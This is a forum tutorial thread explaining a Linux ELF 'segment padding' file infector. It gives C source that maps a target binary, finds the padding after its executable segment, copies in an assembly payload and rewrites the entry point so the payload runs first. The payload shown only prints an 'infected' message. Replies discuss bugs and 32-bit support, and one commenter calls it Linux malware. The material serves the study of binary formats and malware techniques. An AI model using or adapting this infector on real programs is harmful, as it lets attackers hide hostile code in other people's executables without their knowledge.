ELFun File Injector


(pico) #1

As it doesn’t look that @dtm is going to cover linux stuff, I have wrote a quick and dirty version of the great PE File Infector paper from @dtm but targeting ELF binaries specifically under GNU/Linux systems.

The process I will describe is slightly different from the one explained in the PE counterpart, so you will get a different view of the process and hopefully that will help you to better understand how do these things work. Moreover, it does not feel right to just write the same thing even if it is targeting to a different system.

So, let’s start.

Infection Technique

If you had read the “PE File Infector” paper in this site, you should already know what a code cave is. If you do not know that, go and read it, right now.

In the Linux world, you will find references to this technique as Segment padding infection. It is basically the same thing, I’m saing just in case you want to look for further information.

The infection technique we are going to implement is as follow:

  • Find the padding area between the .text segment and the next segment in the program (that is usually .data).
  • Append the payload code to the end of the .text segment (in that padding area)
  • Patch the ELF binary to run the injected coded at start up (modify the ELF entry point)
  • Patch the payload to return execution to the original ELF entry point

The technique takes advantage of the padding areas in the segments. This, basically happen because the operating system works with a Page granularity. It is related to the processor memory management unit, but that is a bit out of scope. So, in general, there is an unused area at the end of the .text segment. The size of that area depends on the size of the code, and may even not exist or just be a couple of bytes. For that reason, this technique may not work with some programs.

The main advantage of this technique is that the file size and the overall ELF data structures are not modified at all (with the exception of the application entry point).

Writing an Infector

The ELF code injector is pretty straightforward. The main function is a bit long, so I will divide it in smaller functional blocks in the hope that it will be easier to follow.

You can find the whole source code at github.

Opening the target ELF File

The first thing the main function does (after a quick check of the number of parameters) is to open the target ELF File. The code looks like this:

main (int argc, char *argv[])
  void        *d, *d1;
  int         target_fd, payload_fd;
  int         fsize, fsize1;

  printf ("Segment Padding Infector for 0x00sec\nby pico\n\n");
  if (argc != 3)
      fprintf (stderr, "Usage:\n  %s elf_file payload\n", argv[0]);
      exit (1);

  /* Open and map target ELF and payload */
  target_fd  = elfi_open_and_map (argv[1], &d, &fsize);
  payload_fd = elfi_open_and_map (argv[2], &d1, &fsize1);

OK, there is not much to say about this, the main function opens and maps the target ELF to inject our code into and the code to be injected… let’s continue looking into the elfi_open_and_map function:

elfi_open_and_map (char *fname, void **data, int *len)
  int   size;
  int   fd;
  if ((fd = open (fname, O_APPEND | O_RDWR, 0)) < 0)
      perror ("open:");
      exit (1);
  size = get_file_size (fd);
  if ((*data = mmap (0, size, PROT_READ| PROT_WRITE| PROT_EXEC,
		    MAP_SHARED, fd, 0)) == MAP_FAILED)
      perror ("mmap:");
      exit (1);
  printf ("+ File mapped (%d bytes ) at %p\n", size, data);
  *len = size;
  return fd;

This function does three things:

  1. It open the file using open
  2. Then it uses a utility function called get_file_size to find out the size of the file. We need this information for the last step. The get_file_size function just calls fstab (I will not include it here as it is not really interesting)
  3. It memory maps the file. This means that we can access the file as if it were in memory (using pointers), but we are actually modifying the file in disk. So, this is a very convenient way of patching a file

The function returns the file descriptor and uses to output parameters to return the pointer to the memory mapped area (that is the beginning of our file) and its size.

Getting information

Now that we have access to our files, we will store some information:

  /* Get Application Entry point */
  elf_hdr = (Elf64_Ehdr *) d;
  ep = elf_hdr->e_entry;
  printf ("+ Target Entry point: %p\n", (void*) ep);

As we said, the pointer returned by elfi_open_and_map points to the actual content of the file. For an ELF file, the first thing we find is the ELF header. Take a look to the specs to find out the information kept by this structure.

Right now, we are interested in the application entry point. That is the address where program will start its execution. Think about it as the memory address for the main function… It is not that easy, but for our current discussion such a definition should be OK.

Finding a gap

Now we have to find a gap in the target file. We had wrote a function to do that, which we call from the main function:

 Elf64_Phdr  *t_text_seg = elfi_find_gap (d, fsize, &p, &len);
 Elf64_Addr  *base = t_text_seg->p_vaddr;

The elfi_find_gap function will go through all the ELF segments and try to find the gap in the one that holds the code. It returns a pointer to the ELF segment structure that we will use later. It also returns the offset in the file to the gap and its size, using a couple of output parameters

After finding the code segment, we will also store the memory address where that code will be loaded. This is usually 0x400000, but it may be different on some applications.

The elfi_find_gap function looks like this:

elfi_find_gap (void *d, int fsize, int *p, int *len)
  Elf64_Ehdr* elf_hdr = (Elf64_Ehdr *) d;
  Elf64_Phdr* elf_seg, *text_seg;
  int         n_seg = elf_hdr->e_phnum;
  int         i;
  int         text_end, gap=fsize;

  elf_seg = (Elf64_Phdr *) ((unsigned char*) elf_hdr 
			    + (unsigned int) elf_hdr->e_phoff);

  for (i = 0; i < n_seg; i++)
      if (elf_seg->p_type == PT_LOAD && elf_seg->p_flags & 0x011)
	  printf ("+ Found .text segment (#%d)\n", i);
	  text_seg = elf_seg;
	  text_end = elf_seg->p_offset + elf_seg->p_filesz;
	  if (elf_seg->p_type == PT_LOAD && 
	      (elf_seg->p_offset - text_end) < gap) 
	      printf ("   * Found LOAD segment (#%d) close to .text (offset: 0x%x)\n",
		      i, (unsigned int)elf_seg->p_offset);
	      gap = elf_seg->p_offset - text_end;
      elf_seg = (Elf64_Phdr *) ((unsigned char*) elf_seg 
			    + (unsigned int) elf_hdr->e_phentsize);

  *p = text_end;
  *len = gap;

  printf ("+ .text segment gap at offset 0x%x(0x%x bytes available)\n", text_end, gap);

  return text_seg;

Once again, we first access the ELF header to figure out where, within the file, the segment information is stored. It actually is at the offset specified by the header’s field e_phoff. With all this information, we can start checking the segments.

First we look for a segment of type PT_LOAD with execution permissions. Normally there is only one, and it is the one containing the .text section, and therefore the application code. When we find it, we store the pointer to the segment structure (to return it later) and the offset to the actual end of the section in the file.

Then we keep looking for PT_LOAD segments and we calculate the gap with respect to the current executable segment we have already found, and we store the one with the smallest gap.

This function probably can be heavily improved. Normally there are only two PT_LOAD segment and they one after the other in the file. I was not sure if it is possible to get those segments out of order in the file (in theory should be possible) so that is why the function is a bit complex.

Oh sure, PT_LOAD segments are those that are directly loaded from the file. Other segments like the ones containing the stack or the .bss section are not stored in the file, but the code and static data have to be there and the PT_LOAD type is the way the system knows that the data in the file has to be loaded in memory.

The Payload

We have to stop for a sec, looking to our infector code and take a look to the payload we are going to use and how to get it into memory. We had just write a simple payload that prints a message in the console. I know that is not very impressive, but this is already becoming a bit long and complex howto.

So, our payload looks like this:

section .text
        global _start

        mov rax,1       ; [1] - sys_write
        mov rdi,1       ; 0 = stdin / 1 = stdout / 2 = stderr
        lea rsi,[rel msg]     ; pointer(mem address) to msg (*char[])
        mov rdx, msg_end - msg      ; msg size
        syscall         ; calls the function stored in rax

	mov rax, 0x11111111
	jmp rax

align 8
        msg     db 'This file has been infected for 0x00SEC',0x0a,0
	msg_end db 0x0

It is the classical Hello World assembler program, but, just after printing the message, it will jump back to somewhere. The 0x11111111 is a mark where we will have to write the original ELF access point, to let the original application run normally.

As usual, we can compile this small program with:

nasm -f elf64 -o payload.o payload.asm;ld -o payload payload.o

And we are done to get back to our ELF injector.

Processing the payload

You could just use some external tool to produce an hex dump of the payload code. Check @unh0lys0da shellcode tutorial for details. In this case, as we are playing with the ELF format, we are going to directly use the binary produced by nasm.

The way we used to compile our payload, was actually producing a ELF file. If you recall the beginning of the paper we had already opened the payload and mapped it on memory. Now we just need to find out where the actual code is, and copy it in the .text segment gap of the target program we have found before.

This is what the code below does:

  Elf63_Shdr *p_text_sec = elfi_find_section (d1, ".text");

  printf ("+ Payload .text section found at %lx (%lx bytes)\n", 
	  p_text_sec->sh_offset, p_text_sec->sh_size);

  if (p_text_sec->sh_size > len)
      fprintf (stderr, "- Payload to big, cannot infect file.\n");
      exit (1);
  /* Copy payload in the segment padding area */
  memmove (d + p, d1 + p_text_sec->sh_offset, p_text_sec->sh_size);

First we call a function (that we will describe in a sec) to find out where the .text section is, and therefore where the payload code is. The function returns a pointer to an ELF section structure that contains all the information we need.

Then we have to check if the size of the .text section of the payload (our code) fits in the gap we had previously found, and finally we just copy the payload code into the target file just at the end of the executable segment. Using the pointer returned by elfi_find_gap.

Finding a Section in an ELF File

So, we have to take a look to the elfi_find_section function. Here it is

Elf64_Shdr *
elfi_find_section (void *data, char *name)
  char        *sname;
  int         i;
  Elf64_Ehdr* elf_hdr = (Elf64_Ehdr *) data;
  Elf64_Shdr *shdr = (Elf64_Shdr *)(data + elf_hdr->e_shoff);
  Elf64_Shdr *sh_strtab = &shdr[elf_hdr->e_shstrndx];
  const char *const sh_strtab_p = data + sh_strtab->sh_offset;
  printf ("+ %d section in file. Looking for section '%s'\n", 
	  elf_hdr->e_shnum, name);
  for (i = 0; i < elf_hdr->e_shnum; i++)
      sname = (char*) (sh_strtab_p + shdr[i].sh_name);
      if (!strcmp (sname, name))  return &shdr[i];
  return NULL;

In order to find a section by name, we have to access to the symbol table in the ELF file. That table stores all the symbols required by the executable. Section names, external libraries, relocation symbols names,… Everything that is a human readable string.

The section list in the ELF file stores the section name as an index in the symbol table. So, despite of all that pointer gymnastics, the function is just looping through the section list, retrieving the name using the information there, and comparing that string with the passed parameter.

Just open the ELF spec, and start following the data structures. It’s just tedious but not difficult.

Patching Entry Points

So, we are almost done. Now we just need to patch the entry points. This is done with the following code in the main function:

  /* Patch return address */
  elfi_mem_subst (d+p, p_text_sec->sh_size, 0x11111111, (long)ep);

  /* Patch entry point */
  elf_hdr->e_entry = (Elf64_Addr) (base + p);

  /* Close files and actually update target file */
  close (payload_fd);
  close (target_fd);

The elfi_mem_subst function just looks for the sequence 0x11111111 (do you remember it in our payload?), and substitutes it with the original ELF entry point. This will start the target application just after running our payload.

Then, for the main entry point, we just use our ELF Header pointer and write there the address for our payload, so it gets executed when the application is executed. We calculate the payload address as the base address we have got from the execution segment plus the offset to the segment gap we found at the beginning.

Once we are done, we just close the files to make sure that all the changes we made in the memory mapped area, make it to the file.

Just for completeness, let’s take a look to elfi_mem_subtr:

elfi_mem_subst (void *m, int len, long pat, long val)
  unsigned char *p = (unsigned char*)m;
  long v;
  int i, r;

  for (i = 0; i < len; i++)
      v = *((long*)(p+i));
      r = v ^pat;

      if (r ==0) 
	  printf ("+ Pattern %lx found at offset %d -> %lx\n", pat, i, val);
	  *((long*)(p+i)) = val;
	  return 0;
  return -1;

Nothing special, we just scan the payload byte by byte to find our mark. When found, it is substituted by the value passed as a parameter (in this case the original entry point).

Using the injector

So, compile the application and generate your payload

$ make elf_injector
$ nasm -f elf64 -o payload.o payload.asm;ld -o payload payload.o

An then just start injecting your payload:

$ ./elf_inject xeyes payload

I had tried the program with some binaries in my system. I have to say that it had failed with some, and I do not know yet the reason. Some of the ones I successfully used were: xeyes, vim, lynx…

It failed with evince, for instance… So, lucky you, it is not perfect, and you have something to look at and play with :)… Have ELFun!

Final Words

If you are planning to look further into this topic (you should, it is really interesting), it would be a good idea to install the readelf for easily inspect your ELF files.

Also make sure that xxd is available to do hex dump and check that you are dumping data in the right place.

I have wrote this pretty quickly so it may not be the most comprehensive howto and some parts may be hard to follow. Let me know in the comments if something needs improvement

Happy Hacking!

A simple Linux Crypter
How To: Extend Python with C
What are you working on?
Dissecting and exploiting ELF files

Woah, why did I never tried this. Basicly this is just Linux malware right?
This is so awesome, thanks for opening my eyes <3
Fuck Windows Internals, I’m gonna focus on this ^^.
Amazing article!


(Command-Line Ninja) #3

Such an amazing article man! Keep it up!!!

(oaktree) #4

I’ll be reading this a few times – to grasp it.

BTW: There’s a bug in your first snippet: You passed fsize twice, rather than passing fsize1 the second time.

(pico) #5

I guess so. May main interest on these topic was to patch or update applications when the source code is not available or dealing with legacy system.

But yes… a binary patching system and a malware works pretty much the same way :wink:


(pico) #6

Thanks for the catch on the code. It’s fixed!


Ok so I figured out what every line of code does and I’m stunned.
This is amazing man so many props.
mmaping, typecasting as Elf header struct, I never thought something like that would be possible.
Thanks for keeping the fun in my pursuit in gaining knowledge :slight_smile:
tbh I had a small crisis of faith in my pursuit lately
Few questions though:

   if ((*data = mmap (0, size, PROT_READ| PROT_WRITE| PROT_EXEC,
		    MAP_SHARED, fd, 0)) == MAP_FAILED)
      perror ("mmap:");
      exit (1);

Here you mmap the file to *data.
Which you then here:

  /* Get Application Entry point */
  elf_hdr = (Elf64_Ehdr *) d;
  ep = elf_hdr->e_entry;
  printf ("+ Target Entry point: %p\n", (void*) ep);

typecast as Elf64_Ehdr

So does this work, because mmap begins from the start of the file, where the magic happens?
Because that realization is just mindblowing.

Alright I’m gonna let all of this sink in and try to find why it doesnt work sometimes.

(pico) #8

Yes, you will get the same, if you open the file normally and just read the first bytes in a Elf64_Ehdr variable.

I’m looking forward to your findings. It looks to be related to PIE code… but it may just be something stupid…


I’ll also work on 32bit support, might this be a cause for the issue?

(pico) #10

Then you need to use the 32bits structures… there are some differences between both… basically change 64 to 32 in all the data structures (e.g. Elf64_Ehdr -> Elf32_Ehdr).


That’s one way, the thing is, I want to let the program check what architecture it is, by typecasting data as an array first and see what arr[4]'s value is (e_ident[EI_CLASS]). So that it would work on both 32 bit and 64 bit.

(oaktree) #12

Why not use #ifndef stuff?


Because it would determin on runtime, it’s not about the injector, it’s about the target file.
@0x00pf Would it be possible to infect 64 bit files, if I’d compile this injector as a 32 bit ELF binary?
I maybe found some bugs:

  elf_seg = (Elf64_Phdr *) ((unsigned char*) elf_hdr 
			    + (unsigned int) elf_hdr->e_phoff);

Here (unsigned int) is a 32 bit value, could it be possible that e_phoff exceeds 0xffffffff ?

also, shouldnt:

if (elf_seg->p_type == PT_LOAD && elf_seg->p_flags & 0x011)


if (elf_seg->p_type == PT_LOAD && ~(elf_seg->p_flags ^ 0x5)

PF_X = 0x1 PF_W = 0x2 PF_R = 0x4
& 0x11, would only hold true for PF_X. Or is .text always the first executable segment it will find?

And I have a question about the following:

  for (i = 0; i < n_seg; i++)
      if (elf_seg->p_type == PT_LOAD && elf_seg->p_flags & 0x011)
	  printf ("+ Found .text segment (#%d)\n", i);
	  text_seg = elf_seg;
	  text_end = elf_seg->p_offset + elf_seg->p_filesz;
	  if (elf_seg->p_type == PT_LOAD && 
	      (elf_seg->p_offset - text_end) < gap) 
	      printf ("   * Found LOAD segment (#%d) close to .text (offset: 0x%x)\n",
		      i, (unsigned int)elf_seg->p_offset);
	      gap = elf_seg->p_offset - text_end;
      elf_seg = (Elf64_Phdr *) ((unsigned char*) elf_seg 
			    + (unsigned int) elf_hdr->e_phentsize);

At the end of each iteration, the elf_seg pointer gets incremented.
that means it points to the struct Elf64_Phdr, + some additional.
This seems counterintuitive to me because if:

| member0 | ... | memberx | ... | member n | ... | member n+x | ...
   └─strct strct->a──┘               │                   │
 after m iterations: strct───────────┘ strct->a──────────┘

So if you’d increment the pointer, wouldn’t that cause it to no longer point to the first member of the struct. And wouldn’t that cause that adressing members goes wrong?

Nvm I’m being stupid, shouldve checked the manpage properly ^^
e_phentsize This member holds the size in bytes of one entry in the file’s program header table; all entries are the same size.
So it does indeed increment the pointer of the struct to such extends that it actually does point to a new struct (entry) in the file
Awesome ^^

Another question (I just keep 'em coming):
Why are we looking for the smallest gap, instead of the biggest?

(pico) #14

That is indeed possible. I just chose 64bits in the post to keep it simple, but indeed, a proper program should work with both architectures… I’m looking forward to your version of the injector!!!

(pico) #15

Sure. We are just changing bytes in a file.

If you check the structure in the elf.h it is actuall 16bits.

I think you are right with this. have you tried the modification?. I will take a look later but looks like you are right.

Well, that code is not the best in the world. This injector always adds the code at the end of the .text segment, so the gap we are looking for in that function is the one from the end of the .text section to the beginning, of whatever other sections comes after. As I didn’t know if the .data segment is always the next section, I just calculate the gap for every single section in the file, and I keep the smaller as that is the one between .text segment and .XXX next segment in memory.

Sorry for the poor wording of this explanation… Let me know if I manage to explain it :slight_smile:


Yes I get it :slight_smile:

About the modification, I’ll try it right now, see if it makes a difference ^^

I’ll also try to implement the 32 and 64 bit stuff.


So far I have this:

Though there are some issues ^_^'
Think I there are some pointer issues.

(Command-Line Ninja) #18

Make another post and link this post!

(pico) #19

At first glance it looks good!

Extracting a Payload
(0x00Jinx) #20

I got bored so I used your code to create a Python module out of this. The code is on Pastebin The instructions are included in the source code in the comment at the top along with an example.